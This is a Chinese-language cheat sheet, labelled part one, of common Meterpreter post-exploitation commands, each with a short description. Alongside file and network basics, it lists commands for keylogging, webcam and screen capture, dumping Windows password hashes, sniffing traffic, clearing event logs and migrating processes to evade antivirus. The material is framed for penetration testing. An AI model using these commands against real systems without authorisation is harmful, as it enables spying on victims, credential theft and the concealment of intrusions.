meterpreter常用命令 上

Meterpreter 是 Metasploit 框架中的一个高级 Payload，广泛用于渗透测试和攻击模拟。以下是一些常用的 Meterpreter 命令：

1. 基本命令
sysinfo

显示目标系统的基本信息（操作系统、架构等）。

getuid

获取当前用户的身份信息。

pwd

显示当前工作目录。

ls

列出当前目录中的文件和目录。

cd <directory>

切换到指定目录。

cat <file>

查看文件内容。

download <file>

从目标系统下载文件到本地机器。

upload <file>

将文件从本地机器上传到目标系统。

exit

退出 Meterpreter 会话。

2. 网络相关命令
ipconfig

显示目标系统的 IP 配置信息。

route

显示目标的路由表，或在目标上添加/删除路由。

portfwd

设置端口转发。

netstat

显示当前的网络连接状态。

3. 系统命令
ps

显示当前系统上运行的进程列表。

kill <pid>

终止指定 PID 的进程。

migrate <pid>

将 Meterpreter 会话迁移到另一个进程，以躲避检测。

getsystem

尝试获取系统级权限（管理员或 root）。

shell

启动系统的命令行 shell，可以执行系统命令。

4. 文件管理命令
mkdir <directory>

创建一个目录。

rmdir <directory>

删除一个目录。

delete <file>

删除指定文件。

rename <oldname> <newname>

重命名文件或目录。

5. 摄像头与屏幕命令
webcam_list

列出目标系统上可用的摄像头。

webcam_snap

获取目标系统摄像头的快照。

screenshot

捕获目标系统的屏幕截图。

6. 键盘和输入命令
keyscan_start

开始记录键盘输入。

keyscan_stop

停止键盘输入记录。

keyscan_dump

显示键盘记录。

7. 会话管理
sessions

列出当前所有活动的 Meterpreter 会话。

sessions -i <session_id>

切换到指定的 Meterpreter 会话。

8. 隐蔽与反检测命令
clearev

清除 Windows 的事件日志。

stealth

启用隐蔽模式，减少被防病毒软件或入侵检测系统发现的风险。

background

将当前会话置于后台运行，继续进行其他操作。

9. Post Exploitation 命令
hashdump

从目标系统提取 Windows 哈希值。

sniffer

启动一个网络嗅探器，捕获目标网络流量。

enum_users

列出目标系统上的所有用户。